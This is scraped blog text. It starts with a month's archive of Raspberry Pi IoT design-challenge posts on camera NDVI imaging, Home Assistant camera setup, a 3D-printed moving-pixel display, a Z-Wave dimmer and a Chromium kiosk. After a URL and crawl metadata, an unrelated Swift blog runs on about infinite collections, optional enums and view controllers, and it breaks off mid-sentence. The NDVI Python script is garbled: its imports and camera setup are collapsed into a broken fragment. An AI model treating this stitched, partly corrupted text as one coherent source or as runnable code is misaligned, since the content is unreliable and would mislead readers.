the two Pi's. In my blog yesterday I talked about taking images in the garden. But up till now The master Pi 3 (with NoIR Camera) and slave Pi B+ (with color camera) are connected via my local network. The Pi 3 using its internal WiFi, and since the WiPi dongle was missing in my kit, the Pi B+ using a cable to my network router. This is not a workable solution, since I like to take the camera to my garden, or the field where no network is available. Therefore I connected the two Pi's using a small ethernet cable. luckily no cross-over cable is needed since the ethernet ports of the Pi are auto sensing. I don't like to install a DHCP server on the Pi 3, therefore I'm using static ip numbers by adding the following to the /etc/dhcpcd.conf file: # static ip address (gp 24/8/2016) interface eth0 static ip_address=192.168.2.222/24 static routers=192.168.2.1 static domain_name_servers=192.168.2.1 Here is a picture of the setup: stay tuned Things have been moving around the Farm lately so expect to see some catch up blog posts coming at you soon! First, anyone else have a loving, caring, helpful spouse who makes your projects grow exponentially? :-) When the project was first planned out we were looking at working with Chickens and Rabbits. Since then my wife has expanded/added G.O.A.Ts (see previous blogs), Guinea Fowl, and now Ducks! (There has been rumor of Peacocks in the future but luckily none can be found in the immediate 250 mile radius.) At this point I have not worked IoT into the new fowl, but I found an opportunity to use the Ducks as a trial test for my future door monitoring with the Chickens. Welcome to the Duck Domain! The Fence is actually up to try and keep out the previously mentioned G.O.A.Ts. It seems that Duck food, Chicken Food heck even Rabbit food is all fair game to those rascally Terminators if their Ocular targeting system finds it! These are all "Free" ducks that she was able to find advertised online, it started as 2, then 2 more, then 2 more, you get the idea. Yes, Chickens are Gateway Fowl, quickly escalating into the Farmer's wife needing more and more diverse additions! The nice side of it is duck eggs are big! The pool gets cleaned often, with the water being toted over to near by trees for reuse. Eventually a pump system is planned to quickly drain it, but for now it is bucket power! So the problem addressed to me, using the handy dandy egg roller tool (see above) to get eggs out of the Ducky Domain Domicile is less than efficient. I have been planning out a sliding door option for the Chicken Casa and thought this would be a good opportunity to apply it quickly using some materials on hand. I have been trying to use free materials as much as possible, recycling and no cost are big pluses on this Farm. So taking a handy dandy pallet, I left one solid board on the bottom to ensure nesting materials stay in the nest and then removed 2 boards out of the middle section on both front and back, ending up with 4 cut boards. #1 I then took 2 2x4s a little smaller then 1/2 the height of the pallet and screwed the 4 boards on to them at the appropriate location to allow for the 2x4 door to be fully down and have the hole covered as shown above. #2 I then used some baling wire attached to the top of the sliding door to allow a firm handle to lift up and control the door. #3 Finally I added a hole through the pallet and the door that when the door is lifted a screw can be put in to hold everything up and in place. There is a staple on the top to hold the screw when it is not being used. #4 Here is the "back" side, which will actually be the inside. You can better see how the 2 2x4s were put in place with the 4 cut boards sealing the hole. You can also see a little better view of the wire handle for lifting the door. Here is the door locked into it's up position. Next step, install it and have the wife test it out. Here the pallet back with sliding door has been placed onto the backside of the Duck Domain Domicile to allow easy access for eggs. The view through the new sliding door! The wife loves it and now wants 3 more. Sigh... But I like this design to use with the Chicken Casa and adding a sensor for when it is closed will let us know remotely when they are locked up. Eventually upgrades will have a remote motor to open, but especially with this implementation I wanted a heavy door to stay down and keep out potential egg/duck thieves of the non-human variety. For all of you Water Fowl enthusiasts, yes we are looking at a full duck pond in the future. My son has already started digging and I have been researching Sodium Bentonite as a water holder. We would really like to work in a self cleaning pond so more research is in the future for that! Today a quick update. I wrote a small program to extract the GNDVI and BNDVI images as explained in my previous post. As explained last week I added the infra-blue filter in front of the Pi NoIR Camera, in order to get rid of the red part of the scene. Then I wrote a small Python program which grabs a color image and converts them to GNDVI and BNDVI: The range of the original NDVI images is -1 to +1. In order to display this properly I converted these values to the range 0-255 and applied a colormap such that NDVI value 0 is green, -1 is blue and +1 is red: # import the necessary packages from picamera.array import PiRGBArray from picamera import PiCamera import time import numpy") color_image = rawCapture.array # extract red green and blue channel nir_channel = color_image[:,:,0]/256.0 green_channel = color_image[:,:,1]/256.0 blue_channel = color_image[:,:,2]/256.0 # calculate and show gndvi gndvi = (nir_channel - green_channel)/(nir_channel + green_channel) gndvi = (gndvi+1)/2 gndvi = cv2.convertScaleAbs(gndvi*255) gndvi = cv2.applyColorMap(gndvi, cv2.COLORMAP_JET) cv2.imshow("GNDVI", gndvi) # calculate and show bndvi bndvi = (nir_channel - blue_channel)/(nir_channel + blue_channel) bndvi = (bndvi+1)/2 bndvi = cv2.convertScaleAbs(bndvi*255) bndvi = cv2.applyColorMap(bndvi, cv2.COLORMAP_JET) cv2.imshow("BNDVI", bndvi) # display the image on screen and wait for a keypress cv2.imshow("Image", color_image) # save images cv2.imwrite("./images/color.jpg",color_image) cv2.imwrite("./images/gndvi.jpg",gndvi) cv2.imwrite("./images/bndvi.jpg",bndvi) cv2.waitKey(0) Unfortunately at the time of writing sunset has passes already two hours ago, so I couldn't image the plants in my garden. The only agricultural stuff I could image was a raspberry: Stay tuned for real plant images and 'real' NDVI images using the other cameras red channel. Here is a quick post on integrating camera's with Home Assistant, this includes Basically, as part of Home Assistant dashboard we are going to add two sections showing the preview of Pi Cameras as shown in the pictures below Here are the steps to follow to integrate the Pi cameras with Home-Assistant #1 Connect the Pi camera to Raspberry Pi 3 and run the following commands to create a directory called picamera pi@hub:~ $ cd /home/hass pi@hub:~ $sudo mkdir picamera pi@hub:/home/hass $ ls picamera pi@hub:/home/hass $ sudo chown hass picamera and then create a image file pi@hub:/home/hass/picamera $ touch image.jpg #2 Update the configuration.yaml file camera: platform: rpi_camera name: Raspberry Pi Camera image_width: 640 image_height: 480 image_quality: 7 image_rotation: 0 timelapse: 1000 horizontal_flip: 0 vertical_flip: 0 file_path: /home/hass/picamera/image.jpg and then stop and start Home-Assistant and test sudo systemctl stop home-assistant@hass sudo systemctl start home-assistant@hass #3 Adding the Security camera to the dashboard modify the configuration.yaml to include the following under the camera section - platform: mjpeg mjpeg_url: name: Security Camera change the ip address above with the security camera Pi's ip address #4 To add Security camera Preview tab and the Intruder detection tab which show the picture gallery Add the following under the panel_iframe section of the configuration.yaml file intruder: title: 'Intruder detection' icon: 'mdi:nature-people' url: '' securitycam: title: 'Security Cam' icon: 'mdi:camera' url: '' change the ip address above with the security camera Pi's ip address I am not sure if the Dynamic Surface is an Animatronics or something related to Robotics. By a certain point of view it is a sort of modular robotic pixel reacting to some kind of inputs in certain conditions. By another point of view it is a modular animatronics, an object - memory of the famous Warhol's tomato sauce can - changing its height smoothly and precisely. Indeed an animatronics is considered a robotic device who mimics human gestures, a puppet, a moving object(s) built with elements usually static or created for different usages. From Wikipedia the definition of animatronic is: Animatronics refers to the use of robotic devices to emulate a human or an animal, or bring lifelike characteristics to an otherwise inanimate object. So, what is the Dynamic Surface? The Dynamic Surface is a series of modular, physical pixels - named m-Pix - assembled together in rows or matrices creating flexible and reactive surfaces. Due its modular architecture involving both the hardware construction and the electronics there are virtually no limits to expand this device that can be easily controlled by a small SBC like the Raspberry PIRaspberry PI. But... We can also think to this compound structure as a Robotics POP modular dimensional display. The design details and simulation are described in PiIoT - The perfect reading place #19 [tech]: Dynamic surface, design and simulation I should mention the MuZIEum that has partnered this project. The Dynamic Surface will be installed together with the other parts of this Internet of Things project inside the MuZIEum site to be available and playable by the visitors starting from the first days of next December 2016; with a special thank to the project manager Carlijn Nijhof. She trusted in the idea when it is was just an idea, also very difficult to explain. Another great thank to GearBest.com that together with the main sponsor Element14 has contributed to the project providing the 100 stepper motors and controllers needed by the entire project. I can't forget to mention shabaz that suggested how to fix the levers to the motor: with hot air. This simple tip has saved me a lot of time and revealed a stable and reliable solution. This m-Pix prototype will be used to develop the software. The Dynamic Surface 64 modules will be produced along the next month of September as the final characteristics, surface, color and container will be discussed with the MuZIEum staff to integrate the components accordingly with the site style, colors and environment. We should take in account that the project should be constrained by some important parameters: the Dynamics Surface will be presented to the visitors also by visually impaired personnel. The main goal is demonstrating how the non-visual perception can be enhanced and improved by the IoT technologies. Alternative user interface methodologies can change and empower the approach between humans and digital machines. A full m-Pix structure is compound of 10 parts. The above image shows seven finished elements: the three parts of the moving cylinder, the support and the motor and levers holder. Below we see in detail the printing process of these parts. The images above shows four moments while printing the top, bottom and central part of the moving cylinder. These parts should be lightweight and are not subject to particular mechanical stress; to reduce the printing time and the weight these three parts are only 20% filled with 0.6 mm to the external skin thickness. It is sufficient to refine the surface after printing without consuming too material. The choice to make the cylinder in three parts simplifies the assembly with a more flexible 3D printing strategy. The above sequence shows four steps of the 3D printing of the support. This part act as a guide for the moving cylinder and fit inside it; this made possible to use few material - always 20% filled - but granting a good positioning of the part: the cylinder moves vertically and avoid rotating without generating friction. Above the levers joint. is a small piece but it should connect the motion levers; it is 3D printed with 100% fill and is glued internally to the bottom cover of the cylinder. The 3D printer motor support - including the end-stop switch support - is built in two parts. The reason is the same: speedup the 3D printing time with lower filling but making a robust component. The base of the support (the rightmost in the above image) is almost large and includes the switch support. The motor holder is kept separate and will be glued over the other inside the engraved area. This gives a perfect positioning and the option to rotate the holder for last minute adjustments. These parts are 3D printed with a 30% filling. This is the main structure support that will hold the motor and the moving parts. As shown in the 3D printing sequence above also in this case the printing fill density is only 25%. Adopting a solution with the motor supports glued in the engraved area visible in the fourth image the movement forces impact on the structure in a direction aligned with the filling support. Indeed the base is almost flexible to compensate some unexpected mechanical stress when many modules are assembled together. Using a special product perfect for the PLA and PVC the parts are glued together. The first step is assembling the bottom of the cylinder with the lever joint: should be glued internally then the cylinder can be closed with the top and bottom parts. The images above show the cylinder bottom cover with the joint glued. Note that the cover has a relief circle to keep it in position with the cylinder body. Now the cylinder can be closed with the top cover as shown in the images below. The next step is to glue the base with the motor support and the cylinder guide. Every module uses a 28BYJ-48 geared stepper motor controlled by a LM298 based motor controller. The controller will be wired externally from the m-Pix while the motor is fixed in the motor support glued to the base. In addition a ultra subminiature micro switch by Omron is used as end-stop for self-position the m-Pix to the lower point. The datasheets of the components are attached below. The images below shows the motor and the linear motion transducer levers. The prototype is complete and all the parts works correctly. The next step will be controlling the movement. The detail images below show the geared stepper motor connected to the transducer levers acting like a camshaft. Thank to shabaz suggestion the easiest way to fix the first lever to the motor shaft was to 3D print the collector about 0.25mm smaller then fit it inside with hot air. The motion has no impact on the lever locking as the motor shaft impress a torsion to the component and it remain in place without risk. One thing I forgot to show you earlier is how to install Z-Wave devices into your house. In this post I'll install a dimmer module in the bedroom, which will be part of the wake up light. The materials I'm going to use are the following:. For your own safety always cut the power when working on your lights. Find out in which group your light is placed and disable the power for this group. Prepare the dimmer and push buttons by connecting them together. It's best to do this now, as while you're not working on the wall yet you have plenty of room. Now install the dimmer and buttons in place and connect the live and switch wires. Push everything inside to check if it fits, but don't close it with screws yet.. Now connect the light itself and screw in a light bulb.. And there was light: By clicking the S1 button you can turn on and off the light. By holding it you can dim it. A nice surprise was that this is the first combination of dimmer/LED which doesn't make any noise while dimming! Now that we verified the light works, the only thing left is finishing up the buttons. Screw it on its place and click the buttons in their socket.. Dynamic surface is another moving subproject part of the PiIot design. It represents an independent moving platform: as well as the PiSense HATPiSense HAT includes an 8x8 RGB LED matrix the Dynamic surface is a physical 8x8 matrix built with big moving pixels. The video below shows a rendered simulation of the assembly design an example of a modular Dynamic Surface built with an asset of 81 modules. As shown above the moving pixel is built of ten pieces to build a m-Pix. A single m-Pix should be self-contained to be assembled in a matrix platform without empty spaces creating the floating surface effect. The rendering of the matrix simulation is shown in the image below. Every module should adhere to the following requisites: As I wrote many other times before in my opinion the most important step when creating a 3D printer object is the design. I mean that - especially when moving parts are involved - it is in the design phase that we may create the right solution always considering limits and advantages of the 3D printer technology. The sequence of images below shows the simulation of the parts concurring to make the entire m-Pix module: Image above: the motor and the base support (here in the horizontal view) act on the cylinder while the stabilisation support is internal: this saves a lot of space but grant a good stability to the moving element. Above images: Making the moving cylinder in three separate parts saved a lot of time making the things easier. With the stabilisation support built-in the moving component, the cylinder will be the largest element in the module. That is just what we want. Another important part of the design is how we convert the stepper motor rotation to linear movement: As shown in the exploded rendering above the adopted solution is a lever system working as a camshaft. Due the reduced space and the low power her we are using a geared stepper motor that has the disadvantage to move relatively slow than the traditional more powerful steppers. Indeed there are many advantages adopting these devices: reduced size, low power consumption, good Kg/cm rotational force (thanks to the geared engine) and a good positioning precision. For our solution we don't need strong force but the movement should be fluid and a bit higher than the max rotation speed of the motor shaft. This is the reason that the use of the camshaft-like lever multiply a bit the speed conversion. Look at the images above. The rendered matrix simulation of some rows of modules shows how the motors wires can be connected to the respective motor controllers. The controllers and the PSoC 4200 array can easily fit on one side of the assembled platform. The modular matrix can be replicated in multiple ones connected together without difficulty. Now we are ready to make the first prototype to see it in the reality! In order to be able to visualise the home control interface on the touch screen, a browser is required. The resolution of the touch screen is limited to 800x480, so every pixel counts. By putting the browser in full screen mode and hiding all the navigation bars, maximum space is made available. This is often referred to as "kiosk mode". Rick has already demonstrated how to put the stock browser "Epiphany" in kiosk mode. In order to try something different and be able to compare with Rick's solution, I decided to use the Chromium browser instead. Chromium is not available in the default repositories. But according to this thread, Chromium can be sourced from the Ubuntu repositories, in order to install on Raspbian Jessie. First, add the new source: pi@piiot1:~ $ sudo nano /etc/apt/sources.list.d/chromium-ppa.list deb vivid main Apply the key to verify the downloaded packages: pi@piiot1:~ $ sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys DB69B232436DAC4B50BDC59E4E1B983C5B393194 Update your package list and install chromium: pi@piiot1:~ $ sudo apt-get update pi@piiot1:~ $ sudo apt install chromium-browser Test the installation by launching the browser. I tried it via SSH and got following error: pi@piiot1:~ $ chromium-browser [16670:16670:0818/222510:ERROR:browser_main_loop.cc(271)] Gtk: cannot open display: To solve this issue, specify which display to use the browser with (the touch screen): pi@piiot1:~ $ chromium-browser --display=:0 Tadaaa! Chromium is installed and running on Raspberry Pi. With Chromium installed and executable, let's take a look at some interesting switches. Switches are command line parameters that can be passed when launching Chromium, altering its behaviour and/or appearance. For my application, these seemed like the most relevant switches: Launching the full command can then be done as follows: pi@piiot1:~ $ chromium-browser --display=:0 --kiosk --noerrdialogs --disable-pinch --overscroll-history-navigation=0 At startup, the Chromium browser is started with different tabs. These tabs are not visible due to the kiosk mode though (and can't accidentally be closed either). In order to navigate between these tabs and refresh their content, we need to know how to simulate the correct keypresses, triggering the tab switching. This is done as follows: pi@piiot1:~ $ xte "keydown Control_L" "key 3" -x:0 && xte "key F5" -x:0 What this does, is switch tab by simulating the "CTRL + <TAB_ID>" combination, optionally followed by an "F5", refreshing the selected tab. In order to implement this tab switching functionality, I'm using the 4x4 button matrix called Trellis, which I introduced in my previous post. It connects to the I2C pins and requires two software libraries to be installed. On the hardware side, nothing fancy: connect the Trellis to the I2C pins and power it via the 5V pin:
https://www.element14.com/community/community/design-challenges/pi-iot/blog/2016/08
CC-MAIN-2017-47
refinedweb
31,227
61.77
There’s quite a bit of conversation on Swift Evolution about the potential future of Sequence and Collection hierarchy. There’s a number of problems that the community is trying to solve and a variety of approaches that have been presented to solve them. Several of these approaches include the ability to create infinite collections, and every time anyone brings this up, someone invariably asks how they would work. Nothing in the type system prevents us from making an infinite collection — it’s purely a semantic constraint — meaning that while we can write infinite collections in Swift today, we’re not supposed to. It violates the assumptions that other people’s code will make about our object. In this post, I’ll take an infinite sequence and demonstrate how we could turn it into an infinite collection. The Fibonacci numbers are a great example of an infinite sequence. For a quick refresher, each element in that sequence is the sum of the previous two numbers. Swift has pretty good facility for defining new sequences quickly. Two useful functions are sequence(state:next:) and sequence(first:next). Here, we’ll use the state version: let fib = sequence(state: (0, 1), next: { state -> Int? in let next = state.0 + state.1 state = (state.1, next) return next }) Calling fib.prefix(10) will give you the first 10 Fibonacci numbers. Note that this is an infinite sequence! If you try to map over this sequence (which the type system fully allows!), your program will just spin infinitely until it runs out of integers or the heat death of the universe, whichever comes first. To convert this into an infinite collection, we need to think about a few things. First, how will we represent an index to a value? For an array, this is a number that probably represents a memory offset. For a string, this might represents a byte offset that that character starts at. It needs to be some value that lets us retrieve the value at that index at constant time, or O(1). One of the interesting things about iterators is that their current state represents the data that you need to get to the next value in constant time. So any deterministic sequence can be represented as a collection, by using its iterator’s state as an index. Our state before is (Int, Int), so we can start off by using that type for our Index. These are the four methods we need to define a Collection: struct FibonacciCollection: Collection { typealias Index = (Int, Int) var startIndex: Index { return (0, 1) } func index(after previous: Index) -> Index { return (previous.1, previous.0 + previous.1) } var endIndex: Index { fatalError("This collection has no endIndex, because it is infinite") } subscript(index: Index) -> Int { return index.0 + index.1 } } We can use (Int, Int) (our state from the fibonacci numbers when they were a sequence) as the index, and use (0, 1) as our starting value (just like our sequence). But there are a few problems with this approach. To iterate over an arbitrary collection, you can imagine constructing a big while loop: var index = collection.startIndex while index < endIndex { let value = collection[index] // use `value` somehow index = collection.index(after: index) } (This isn’t how we’d use our collection, since we know it’s infinite, but this is how normal collections work.) Two things stand out. First, we need the Index type to be Comparable — so we can’t use a tuple — and we need endIndex to be defined so that we can check against it — so we can’t fatalError (ding!). So we need a new index type: something that’s Comparable and something that’s unreachable. The unreachable value should compute to being “greater” than all the reachable values (since it goes at the “end” of the collection). Our first attack is to model this as a struct of two integers, to solve the comparability } } This solves the comparability problem, but not the unreachability problem. We need a way to represent one more value, a value that’s separate from all the others. Let’s start over, but with an enum this time: enum FibIndex { case reachable(Int, Int) case unreachable } This could solve both of our problems. Unfortunately, it makes writing == and < pretty messy: extension FibIndex: Comparable { static func == (lhs: FibIndex, rhs: FibIndex) -> Bool { switch (lhs, rhs) { case (.unreachable, .unreachable): return true case let (.reachable(l1, l2), .reachable(r1, r2)): return l1 == r1 && l2 == r2 case (.reachable, .unreachable): return false case (.unreachable, .reachable): return false } } static func < (lhs: FibIndex, rhs: FibIndex) -> Bool { switch (lhs, rhs) { case (.unreachable, .unreachable): return false case let (.reachable(l1, l2), .reachable(r1, r2)): return l1 < r1 case (.reachable, .unreachable): return true case (.unreachable, .reachable): return false } } } (There are some ways to clean this up with better pattern matching, but I’m going with the explicitness of the full patterns here.) Let’s add some helpers: extension FibIndex { var sum: Int { switch self { case .unreachable: fatalError("Can't get the sum at an unreachable index") case let .reachable(first, second): return first + second } } var next: FibIndex { switch self { case .unreachable: fatalError("Can't get the next value of an unreachable index") case let .reachable(first, second): return .reachable(second, first + second) } } } And now we can complete our FibonacciCollection: struct FibonacciCollection: Collection { typealias Index = FibIndex var startIndex: Index { return .reachable(0, 1) } func index(after previous: Index) -> Index { return previous.next } var endIndex: Index { return .unreachable } subscript(index: Index) -> Int { return index.sum } } This is pretty good! We get all of the methods from the Sequence and Collection protocols for free. Unfortunately, this is still an infinite collection, and just like the infinite sequence, we can’t map over it, or we’ll risk looping forever. There are new things on the Collection protocol that we also can’t do — like get the count of this collection. That will also spin forever. There is one more tweak I’d like to show here, which is extracting the Fibonacci-specific parts of this and making a generic InfiniteCollectionIndex. To do this, we’d keep our basic enum’s structure, but instead of the .reachable case having type (Int, Int), we’d need to put a generic placeholder there. How would that look? Let’s call the inner index type WrappedIndex. We need to make sure that the wrapped Index is comparable: enum InfiniteCollectionIndex<WrappedIndex: Comparable>: Comparable { case reachable(WrappedIndex) case unreachable } The Equatable and Comparable implementation stay mostly the same, but instead of comparing integers, they just forward to WrappedIndex: extension InfiniteCollectionIndex: Comparable { static func == (lhs: InfiniteCollectionIndex, rhs: InfiniteCollectionIndex) -> Bool { switch (lhs, rhs) { case (.unreachable, .unreachable): return true case let (.reachable(left), .reachable(right)): return left == right case (.reachable, .unreachable): return false case (.unreachable, .reachable): return false } } static func < (lhs: InfiniteCollectionIndex, rhs: InfiniteCollectionIndex) -> Bool { switch (lhs, rhs) { case (.unreachable, .unreachable): return false case let (.reachable(left), .reachable(right)): return left < right case (.reachable, .unreachable): return true case (.unreachable, .reachable): return false } } } And one more helper, because there will be a lot of situations where we want to assume that that the .unreachable value is, well, unreachable: extension InfiniteCollectionIndex { func assumingReachable<T>(_ block: (WrappedIndex) -> T) -> T { switch self { case .unreachable: fatalError("You can't operate on an unreachable index") case let .reachable(wrapped): return block(wrapped) } } func makeNextReachableIndex(_ block: (WrappedIndex) -> WrappedIndex) -> InfiniteCollectionIndex { return .reachable(assumingReachable(block)) } } This function takes a block that assumes that the value is .reachable, and returns whatever that block returns. If the value is .unreachable, it crashes. We can now use the struct form of FibIndex from } } I won’t go into too much of the details here, but this allows us to define simple Comparable index types, and make them into infinite indexes easily: struct FibonacciCollection: Collection { typealias Index = InfiniteCollectionIndex<FibIndex> var startIndex: Index { return .reachable(FibIndex(first: 0, second: 1)) } func index(after previous: Index) -> Index { return previous.makeNextReachableIndex({ FibIndex(first: $0.second, second: $0.first + $0.second) }) } var endIndex: Index { return .unreachable } subscript(index: Index) -> Int { return index.assumingReachable({ $0.first + $0.second }) } } It’s not clear which way the tides will ultimately shift with Swift’s Collection model, but if and when infinite collections become legal in Swift, this technique will help you define them easily. This article is also available in Chinese. Last year I wrote a post about how adding simple optional properties to your classes is the easy thing to do when you want to extend functionality, but can actually subtly harm your codebase in the long run. This post is the spiritual successor to that one. Let’s say you’re designing the auth flow in your app. You know this flow isn’t going to be simple or linear, so you want to make some very testable code. Your approach to this is to first think through all the screens in that flow and put them in an enum: enum AuthFlowStep { case collectUsernameAndPassword case findFriends case uploadAvatar } Then you put all your complicated logic into a single function that takes a the current step and the current state, and spits out the next step of the flow: func stepAfter(_ currentStep: AuthFlowStep, context: UserState) -> AuthFlowStep This should be very easy to test. So far, so good. Except — you’re working through the logic, and you realize that sometimes you won’t always be able to return a AuthFlowStep. Once the user has submitted all the data they need to fully auth, you need something that will signal that the flow is over. You’re working right there in the function, and you want to want to return a special case of the thing that you already have. What do you do? You change the return type to an optional: func stepAfter(_ currentStep: AuthFlowStep, context: UserState) -> AuthFlowStep? This solution works. You go to your coordinator and call this function, and start working with it: func finished(flowStep: AuthFlowStep, state: UserState, from vc: SomeViewController) { let nextState = stepAfter(flowStep, context: state) When we get nextState, it’s optional, so the default move here is to guard it to a non-optional value. guard let nextState = stepAfter(flowStep, context: state) else { self.parentCoordinator.authFlowFinished(on: self) } switch nextState { case .collectUsernameAndPassword: //build and present next view controller This feels a bit weird, but I remember Olivier’s guide on pattern matching in Swift, and I remember that I can switch on the optional and my enum at the same time: func finished(flowStep: AuthFlowStep, state: UserState, from viewController: SomeViewController) { let nextState = stepAfter(flowStep, context: state) // Optional<AuthFlowStep> switch nextState { case nil: self.parentCoordinator.authFlowFinished(on: self) case .collectUsernameAndPassword?: //build and present next view controller That little question mark lets me match an optional case of an enum. It makes for better code, but something still isn’t sitting right. If I’m doing one big switch, why am I trying to unwrap a nested thing? What does nil mean in this context again? If you paid attention to the title of the post, perhaps you’ve already figured out where this is going. Let’s look at the definition of Optional. Under the hood, it’s just an enum, like AuthFlowState: enum Optional<Wrapped> { case some(Wrapped) case none } When you slot an enum into the Optional type, you’re essentially just adding one more case to the Wrapped enum. But we have total control over our AuthFlowStep enum! We can change it and add our new case directly to it. enum AuthFlowStep { case collectUsernameAndPassword case findFriends case uploadAvatar case finished } We can now remove the ? from our function’s signature: func stepAfter(_ currentStep: AuthFlowStep, context: UserState) -> AuthFlowStep And our switch statement now switches directly over all the cases, with no special handling for the nil cases. Why is this better? A few reasons: First, what was once nil is now named. Before, users of this function might not know exactly what it means when the function returns nil. They either have to resort to reading documentation, or worse, reading the code of the function, to understand when nil might be returned. Second, simplicity is king. No need to have a guard then a switch, or a switch that digs through two layers of enums. One layer of thing, always easy to handle. Lastly, precision. Having return nil available as a bail-out at any point in a function can be a crutch. The next developer might find themselves in an exceptional situation where they’d like to jump out of the function, and so they drop a return nil Except now, nil has two meanings, and you’re not handling one of them correctly. When you add your own special cases to enums, it’s also worth thinking about the name you’ll use. There are lots of names available, any of which might make sense in your context: .unknown, .none, .finished, .initial, .notFound, .default, .nothing, .unspecified, and so on. (One other thing to note is that if you have a .none case, and you do happen to make that value optional, then whether it will use Optional.none or YourEnum.none is ambiguous.) I’m using flow states as a general example here, but I think the pattern can be expanded to fit other situations as well — anytime you have an enum and want to wrap it in an optional, it’s worth thinking if there’s another enum case hiding there, begging to be drawn out. Thanks to Bryan Irace for feedback and the example for this post. In Apple’s documentation, they suggest you use a pattern called MVC to structure your apps. However, the pattern they describe isn’t true MVC in the original sense of the term. I’ve touched on this point here before, but MVC was a design pattern created for Smalltalk. In Smalltalk’s formulation, each of the 3 components, model, view, and controller, each talked directly to each other. This means that either the view knows how to apply a model to itself, or the model knows how to apply itself to a view. When we write iOS apps, we consider models and views that talk directly to each other as an anti-pattern. What we call MVC is more accurately described as model-view-adapter. Our “view controllers” (the “adapters”) sit in between the model and view and mediate their interactions. In general, I think this is a good modification to MVC — the model and view not being directly coupled together and instead connected via an intermediary seems like a positive step. However, I will caveat this by saying that I haven’t worked with many systems that don’t maintain this separation. So, that’s why we have view controllers in iOS. They serve to glue the model and view together. Now, there are downstream problems with this style of coding: code that doesn’t obviously belong in models or views ends up in the view controller, and you end up with gigantic view controllers. I’ve discussed that particular problem on this blog many times, but it’s not exactly what I want to talk about today. I’ve heard whispers through the grapevine of what’s going on under the hood with UIViewController. I think the longer you’ve been working with UIKit, the more obvious this is, but the UIViewController base class is not pretty. I’ve heard that, in terms of lines of code, it’s on the higher end of 10,000 to 20,000 lines (and this was a few years ago, so they’ve maybe broken past the 20 kloc mark at this point). When you want the benefits of an object to glue a UIView and a model object (or collection thereof) together, typically, we use view controller containment to break the view controller up into smaller pieces, and compose them back together. However, containment can be finicky. It subtly breaks things if you don’t do it right, with no indication of how to fix any issues. Then, when you finally do see your bug, which was probably a misordering of calls to didMove or willMove or whatever, everything magically starts working. In fact, the very presence of willMove and didMove suggest that containment has some invisible internal state that needs to be cleaned up. I’ve seen this firsthand in two particular situations. First, I’ve seen this issue pop up with putting view controllers in cells. When I first did this, I had a bug in the app where some content in the table view would randomly disappear. This bug went on for months, until I realized I misunderstood the lifecycle of table view cells, and I wasn’t correctly respecting containment. Once I added the correct -addChildViewController calls, everything started working great. To me, this showed a big thing: a view controller’s view isn’t just a dumb view. It knows that it’s not just a regular view, but that it’s a view controller’s view, and its qualities change in order to accommodate that. In retrospect, it should have been obvious. How does UIViewController know when to call -viewDidLayoutSubviews? The view must be telling it, which means the view has some knowledge of the view controller. The second case where I’ve more recently run into this is trying to use a view controller’s view as a text field’s inputAccessoryView. Getting this behavior to play nicely with the behavior from messaging apps (like iMessage) of having the textField stick to the bottom was very frustrating. I spent over a day trying to get this to work, with minimal success to show for it. I ended up reverting to a plain view. I think at a point like that, when you’ve spent over a day wrestling with UIKit, it’s time to ask: is it really worth it to subclass from UIViewController here? Do you really need 20,000 lines of dead weight to to make an object that binds a view and a model? Do you really need viewWillAppear and rotation callbacks that badly? So, what does UIViewController do that we always want? - Hold a view. - Bind a model to a view. What does it do that we usually don’t care about? - Provide storage for child view controllers. - Forward appearance ( -viewWillAppear:, etc) and transition coordination to children. - Can be presented in container view controllers like UINavigationController. - Notify on low memory. - Handle status bars. - Preserve and restore state. So, with this knowledge, we now know what to build in order to replace view controllers for the strange edge cases where we don’t necessarily want all their baggage. I like this pattern because it tickles my “just build it yourself” bone and solves real problems quickly, at the exact same time. There is one open question, which is what to name it. I don’t think it should be named a view controller, because it might be easy to confuse for a UIViewController subclass. We could just call it a regular Controller? I don’t hate this solution (despite any writings in the past) because it serves this same purpose a controller in iOS’s MVC (bind a view and model together), but there are other options as well: Binder, Binding, Pair, Mediator, Concierge. The other nice thing about this pattern is how easy it is to build. class DestinationTextFieldController { var destination: Destination? weak var delegate: DestinationTextFieldControllerDelegate? let textField = UITextField().configure({ $0.autocorrectionType = .no $0.clearButtonMode = .always }) } It almost seems like heresy to create an object like this and not subclass UIViewController, but when UIViewController isn’t pulling its weight, it’s gotta go. You already know how to add functionality to your new object. In this case, the controller ends up being the delegate of the textField, emitting events (and domain metadata) when the text changes, and providing hooks into updating its view (the textField in this case). extension DestinationTextFieldController { var isActive: Bool { return self.textField.isFirstResponder } func update(with destination: Destination) { self.destination = destination configureView() } private func configureView() { textField.text = destination.descriptionForDisplay } } There are a few new things you’re responsible with this new type of controller: - you have to make an instance variable to store it - you’re responsible for triggering events on it — because it’s not a real view controller, there’s no more -viewDidAppear: - you’re not in UIKit anymore, so you can’t directly rely on things like trait collections or safe area insets or the responder chain — you have to pass those things to your controller explicitly Using this new object isn’t too hard, even thought you do have to explicitly store it so it doesn’t deallocate: class MyViewController: UIViewController, DestinationTextFieldControllerDelegate { let destinationViewController = DestinationTextFieldController() override func viewDidLoad() { super.viewDidLoad() destinationViewController.delegate = self view.addSubview(destinationViewController.view) } //handle any delegate methods } Even if you use this pattern, most of your view controllers will still be view controllers and subclass from UIViewController. However, in those special cases where integrating a view controller causes you hours and hours of pain, this can be a perfect way to simply opt out of the torment that UIKit brings to your life daily. If you want some extreme bikeshedding on a very simple topic, this is the post for you. For the folks who have been at any of the recent conferences I’ve presented at, you’ve probably seen my talk, You Deserve Nice Things. The talk is about Apple’s reticence to provide conveniences for its various libraries. It draws a lot on an old post of mine, Categorical, as well as bringing in a lot of new Swift stuff. One part of the standard library that’s eminently extendable is Sequence and friends. Because of the number of different operations we want to perform on these components, even the large amount of affordances that the standard library does provide (standard stuff like map, filter, as well as more abstruse stuff like partition(by:) and lexicographicallyPrecedes), it still doesn’t cover the breadth of operations that are useful in our day to day programming life. In the talk, I propose a few extensions that I think are useful, including any, all, none, and count(where:), eachPair, chunking, and a few others. None of these ideas are original to me. They’re ideas lifted wholesale from other languages, primary Ruby and its Enumerable module. Enumerable is a useful case study because anything that’s even marginally useful gets added to this module, and Ruby developers reap the benefits. Swift’s standard library is a bit more conservative, but its ability to extend types and specifically protocols makes the point mostly moot. You can bring your own methods as needed. (In Categorical, I make the case that this is the responsibility of the vendor, but until they’re willing to step up, we’re on our own.) I have an app where I need to break up a gallery of images in groups based on date. The groups could be based on individual days, but we thought grouping into “sessions” would be better. Each session is defined by starting more than an hour after the last session ended. More simply, if there’s a gap between two photos of more than hour, that should signal the start of a new session. Since 